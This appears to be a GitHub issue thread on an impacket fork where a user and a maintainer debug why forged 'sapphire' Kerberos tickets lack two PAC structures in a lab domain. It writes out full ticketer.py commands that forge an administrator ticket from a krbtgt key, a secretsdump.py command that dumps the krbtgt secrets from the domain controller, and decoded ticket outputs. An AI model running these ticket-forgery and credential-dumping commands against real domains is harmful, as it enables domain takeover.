Tickerter Sapphire ticket issue

[Cyb3rGh0st786]

Configuration

impacket version: 0.10.1.dev1+20230828.161954.3f48a55e
Python version: 3.11.4
Target OS: Kali Linux

I tried to create a sapphire ticket using ticketer.py. The ccache file has been created, but when I try to use it with wmiexec.py or secretsdump.py, I get an error saying TGT revoked

Tickerter Command

ticketer.py -request -impersonate 'administrator' -domain 'adlab.com' -user 'normaldomainuser' -mypassword' -aesKey 'Krgtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'administrator' -debug

Debug info attached

Debug info.txt

Export the cache file

export KRB5CCNAME=~/Desktop/tools/impacket-theporgs/administrator.ccache

Secretsdumpy

secretsdump.py adlab.com/administrator@192.168.126.200 -dc-ip 192.168.126.200 -just-dc-user krbtgt -k -no-pass -debug

Describe the ticket

ali㉿kali)-[~/Desktop/tools/impacket-theporgs/examples]
└─$ describeTicket.py ../administrator.ccache -d adlab.com -u administrator -debug --aes krbtgtaeskey
Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230828.161954.3f48a55e-py3.11.egg/impacket
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 764c6d756b487769634f637845587861784553466a67727a4172507569426b44
[*] User Name                     : administrator
[*] User Realm                    : ADLAB.COM
[*] Service Name                  : krbtgt/ADLAB.COM
[*] Service Realm                 : ADLAB.COM
[*] Start Time                    : 06/09/2023 12:41:00 PM
[*] End Time                      : 06/09/2023 22:41:00 PM
[*] RenewTill                     : 07/09/2023 12:41:00 PM
[*] Flags                         : (0x50e50000) forwardable, proxiable, renewable, initial, pre_authent, ok_as_delegate, enc_pa_rep
[*] KeyType                       : aes256_cts_hmac_sha1_96
[*] Base64(key)                   : dkxtdWtId2ljT2N4RVh4YXhFU0ZqZ3J6QXJQdWlCa0Q=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/adlab.com
[*]   Service Realm               : ADLAB.COM
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[+] Handling Kerberos keys
[+] No password (-p/--password or -hp/--hex_pass supplied, skipping Kerberos keys calculation
[+] Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18)
[+] Using corresponding key: Mykrbtgtaeskey
[+] Ticket successfully decrypted
[*] Decoding credential[0]['ticket']['enc-part']:
[*]   LoginInfo                   
[*]     Logon Time                : 06/09/2023 05:50:04 AM
[*]     Logoff Time               : Infinity (absolute time)
[*]     Kickoff Time              : Infinity (absolute time)
[*]     Password Last Set         : 01/09/2023 03:15:28 AM
[*]     Password Can Change       : 02/09/2023 03:15:28 AM
[*]     Password Must Change      : Infinity (absolute time)
[*]     LastSuccessfulILogon      : Infinity (absolute time)
[*]     LastFailedILogon          : Infinity (absolute time)
[*]     FailedILogonCount         : 0
[*]     Account Name              : Administrator
[*]     Full Name                 : 
[*]     Logon Script              : 
[*]     Profile Path              : 
[*]     Home Dir                  : 
[*]     Dir Drive                 : 
[*]     Logon Count               : 443
[*]     Bad Password Count        : 0
[*]     User RID                  : 500
[*]     Group RID                 : 513
[*]     Group Count               : 5
[*]     Groups                    : 520, 512, 513, 519, 518
[*]     Groups (decoded)          : (520) Group Policy Creator Owners
[*]                                 (512) Domain Admins
[*]                                 (513) Domain Users
[*]                                 (519) Enterprise Admins
[*]                                 (518) Schema Admins
[*]     User Flags                : (544) LOGON_EXTRA_SIDS, LOGON_RESOURCE_GROUPS
[*]     User Session Key          : 00000000000000000000000000000000
[*]     Logon Server              : WIN-3MBDJTT1P21
[*]     Logon Domain Name         : ADLAB
[*]     Logon Domain SID          : S-1-5-21-991381806-4095455566-2546632930
[*]     User Account Control      : (528) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD
[*]     Extra SID Count           : 1
[*]     Extra SIDs                : S-1-18-2 Service asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*]     Resource Group Domain SID : S-1-5-21-991381806-4095455566-2546632930
[*]     Resource Group Count      : 1
[*]     Resource Group Ids        : 572
[*]     LMKey                     : 0000000000000000
[*]     SubAuthStatus             : 0
[*]     Reserved3                 : 0
[*]   ClientName                  
[*]     Client Id                 : 06/09/2023 08:41:00 AM
[*]     Client Name               : administrator
[*]   UpnDns                      
[*]     Flags                     : (3) U_UsernameOnly, S_SidSamSupplied
[*]     UPN                       : Administrator@adlab.com
[*]     DNS Domain Name           : ADLAB.COM
[*]     SamAccountName            : Administrator
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-500
[*]   ServerChecksum              
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 4a90cb2ccd5af0c688a1e872
[*]   KDCChecksum                 
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 60f68b1fa5ffbfae4317db95

[Cyb3rGh0st786]

@ShutdownRepo FYI

[ShutdownRepo]

The PAC_ATTRIBUTES_INFO and PAC_REQUESTOR_INFO structures seem to be missing from your ticket, it's probably the cause of you error, as per #1390 and #1545
But the changes have been merged, I don't why you don't have those new structures in your PAC
If you're able to obtain a ticket for normaldomainuser and describe it and see if the structures are in his ticket it'd be awesome

[Cyb3rGh0st786]

@ShutdownRepo ,
Here is what I have done and userone is my normal domain user account, and I have tried to impersonate this user
ticketer.py -request -impersonate 'userone' -domain 'adlab.com' -user 'userone' -password 'mypassword' -aesKey 'mykrbtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'userone' -debug

debuginfo-userone.txt

describe ticket

describeTicket.py ./userone.ccache -u "userone" --aes "krbtgtaeskey" -d adlab.com

Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 665274625a666351596166594e5375694c666a766e76724958464466786e5377
[*] User Name                     : userone
[*] User Realm                    : ADLAB.COM
[*] Service Name                  : krbtgt/ADLAB.COM
[*] Service Realm                 : ADLAB.COM
[*] Start Time                    : 06/09/2023 15:28:57 PM
[*] End Time                      : 07/09/2023 01:28:57 AM
[*] RenewTill                     : 07/09/2023 15:28:57 PM
[*] Flags                         : (0x50e50000) forwardable, proxiable, renewable, initial, pre_authent, ok_as_delegate, enc_pa_rep
[*] KeyType                       : aes256_cts_hmac_sha1_96
[*] Base64(key)                   : ZlJ0YlpmY1FZYWZZTlN1aUxmanZudnJJWEZEZnhuU3c=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/adlab.com
[*]   Service Realm               : ADLAB.COM
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*]   LoginInfo                   
[*]     Logon Time                : 06/09/2023 11:28:57 AM
[*]     Logoff Time               : Infinity (absolute time)
[*]     Kickoff Time              : Infinity (absolute time)
[*]     Password Last Set         : 10/04/2023 04:10:22 AM
[*]     Password Can Change       : 11/04/2023 04:10:22 AM
[*]     Password Must Change      : Infinity (absolute time)
[*]     LastSuccessfulILogon      : Infinity (absolute time)
[*]     LastFailedILogon          : Infinity (absolute time)
[*]     FailedILogonCount         : 0
[*]     Account Name              : userone
[*]     Full Name                 : user one
[*]     Logon Script              : 
[*]     Profile Path              : 
[*]     Home Dir                  : 
[*]     Dir Drive                 : 
[*]     Logon Count               : 426
[*]     Bad Password Count        : 0
[*]     User RID                  : 1103
[*]     Group RID                 : 513
[*]     Group Count               : 1
[*]     Groups                    : 513
[*]     Groups (decoded)          : (513) Domain Users
[*]     User Flags                : (32) LOGON_EXTRA_SIDS
[*]     User Session Key          : 00000000000000000000000000000000
[*]     Logon Server              : WIN-3MBDJTT1P21
[*]     Logon Domain Name         : ADLAB
[*]     Logon Domain SID          : S-1-5-21-991381806-4095455566-2546632930
[*]     User Account Control      : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*]     Extra SID Count           : 1
[*]     Extra SIDs                : S-1-18-2 Service asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*]     Resource Group Domain SID :
[*]     Resource Group Count      : 0
[*]     Resource Group Ids        : 
[*]     LMKey                     : 0000000000000000
[*]     SubAuthStatus             : 0
[*]     Reserved3                 : 0
[*]   ClientName                  
[*]     Client Id                 : 06/09/2023 11:28:57 AM
[*]     Client Name               : userone
[*]   UpnDns                      
[*]     Flags                     : (2) S_SidSamSupplied
[*]     UPN                       : userone@adlab.com
[*]     DNS Domain Name           : ADLAB.COM
[*]     SamAccountName            : userone
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-1103
[*]   ServerChecksum              
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 323030dcfb8e1b872bc06989
[*]   KDCChecksum                 
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : f6da234e225e7febd9b55788

Please let me know if you need any further details and testing

[ShutdownRepo]

I'd need the regular TGT for userone
Something you'd get with getTGT

[Cyb3rGh0st786]

@ShutdownRepo ,

Here you go

Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : ec72f38ed852119ac094cc0a33190dcfe7a0d1e709a97b6b5e5f70a3e7aad346
[*] User Name                     : userone
[*] User Realm                    : ADLAB.COM
[*] Service Name                  : krbtgt/adlab.com
[*] Service Realm                 : ADLAB.COM
[*] Start Time                    : 06/09/2023 21:40:31 PM
[*] End Time                      : 07/09/2023 07:40:31 AM
[*] RenewTill                     : 07/09/2023 21:40:32 PM
[*] Flags                         : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType                       : aes256_cts_hmac_sha1_96
[*] Base64(key)                   : 7HLzjthSEZrAlMwKMxkNz+eg0ecJqXtrXl9wo+eq00Y=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/adlab.com
[*]   Service Realm               : ADLAB.COM
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*]   LoginInfo                   
[*]     Logon Time                : 06/09/2023 17:36:37 PM
[*]     Logoff Time               : Infinity (absolute time)
[*]     Kickoff Time              : Infinity (absolute time)
[*]     Password Last Set         : 06/09/2023 17:40:02 PM
[*]     Password Can Change       : 07/09/2023 17:40:02 PM
[*]     Password Must Change      : Infinity (absolute time)
[*]     LastSuccessfulILogon      : Infinity (absolute time)
[*]     LastFailedILogon          : Infinity (absolute time)
[*]     FailedILogonCount         : 0
[*]     Account Name              : userone
[*]     Full Name                 : user one
[*]     Logon Script              : 
[*]     Profile Path              : 
[*]     Home Dir                  : 
[*]     Dir Drive                 : 
[*]     Logon Count               : 428
[*]     Bad Password Count        : 1
[*]     User RID                  : 1103
[*]     Group RID                 : 513
[*]     Group Count               : 1
[*]     Groups                    : 513
[*]     Groups (decoded)          : (513) Domain Users
[*]     User Flags                : (32) LOGON_EXTRA_SIDS
[*]     User Session Key          : 00000000000000000000000000000000
[*]     Logon Server              : WIN-3MBDJTT1P21
[*]     Logon Domain Name         : ADLAB
[*]     Logon Domain SID          : S-1-5-21-991381806-4095455566-2546632930
[*]     User Account Control      : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*]     Extra SID Count           : 1
[*]     Extra SIDs                : S-1-18-1 Authentication authority asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*]     Resource Group Domain SID :
[*]     Resource Group Count      : 0
[*]     Resource Group Ids        : 
[*]     LMKey                     : 0000000000000000
[*]     SubAuthStatus             : 0
[*]     Reserved3                 : 0
[*]   ServerChecksum              
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 493b020c12ca0ee59a8ca947
[*]   KDCChecksum                 
[*]     Signature Type            : hmac_sha1_96_aes256
[*]     Signature                 : 06a9f66bc1ec98cfc43d1f4e
[*]   ClientName                  
[*]     Client Id                 : 06/09/2023 17:40:31 PM
[*]     Client Name               : userone
[*]   UpnDns                      
[*]     Flags                     : (2) S_SidSamSupplied
[*]     UPN                       : userone@adlab.com
[*]     DNS Domain Name           : ADLAB.COM
[*]     SamAccountName            : userone
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-1103
[*]   Attributes Info             
[*]     Flags                     : (1) PAC_WAS_REQUESTED
[*]   Requestor Info              
[*]     UserSid                   : S-1-5-21-991381806-4095455566-2546632930-1103

[Cyb3rGh0st786]

userone.ccache.zip
I added the ccache file also which I got it from gettgt for your reference. Remove the .zip extension

[ShutdownRepo]

that's what I thought, structures PAC_ATTRIBUTES_INFO and PAC_REQUESTOR are in the original userone's TGT and are not in the ticket produced with ticketer for some reason, which indicates that the issue is probably located around here

impacket/examples/ticketer.py

Lines 652 to 662 in d7b5e37

	if PAC_ATTRIBUTES_INFO in pacInfos:
	pac_count += 1
	pacAttributesInfoBlob = pacInfos[PAC_ATTRIBUTES_INFO]
	pacAttributesInfoAlignment = b'\x00' * self.getPadLength(len(pacAttributesInfoBlob))
	pacRequestorInfoBlob = None
	pacRequestorInfoAlignment = None
	if PAC_REQUESTOR_INFO in pacInfos:
	pac_count += 1
	pacRequestorInfoBlob = pacInfos[PAC_REQUESTOR_INFO]
	pacRequestorInfoAlignment = b'\x00' * self.getPadLength(len(pacRequestorInfoBlob))

I won't be able to debug that just yet, would you be able to try debugging and find out where's the wrong happening?

[Cyb3rGh0st786]

Sure, I will give it a try

[ShutdownRepo]

So, from the tests we made together with @kaleemshaik7867 today, what's happening is Sapphire Ticket takes an initial ticket's PAC and "copies" it into a new one. The initial ticket is obtained through S4U2self + U2U.
This initial PAC is missing the two PAC blobs PAC_ATTRIBUTES_INFO and PAC_REQUESTOR, that's why they are missing from the final ticket.
If we obtain the initial ticket manually (getTGT user1, getST -u2u -self -impersonate user2) the result is the same.
Nota bene: the user1's TGT is not missing the two structures, meaning the structures go missing in the getST process.
This means that there is either an issue in how the ticket is requested through getST with S4U2self+U2U (a flag missing for instance, or anything that tells the DCs not to include the news structures), or there is a problem with the environment (the DC fails to produce a service ticket with the new structures, which is unlikely).
Next step: understand what's wrong with the ST request

[ShutdownRepo]

Additional testing indicates that the structures go missing after a regular ST request with getST.py, so if something's wrong with getST.py, it's not only with S4U2self + U2U. Maybe those structures are meant to go away in a service ticket, which I don't think is the reason because afaik, a TGT's PAC is copy-pasted in a service ticket when a user asks for an ST 🤷

[ShutdownRepo]

This issue can be closed. I figured it out and pushed fixes. Enforced KB5008380 was the root cause.

[Cyb3rGh0st786]

Thank you, @ShutdownRepo, for your exceptional support in closing the issue.

[ShutdownRepo]

Glad we sorted it out, thank you for the great help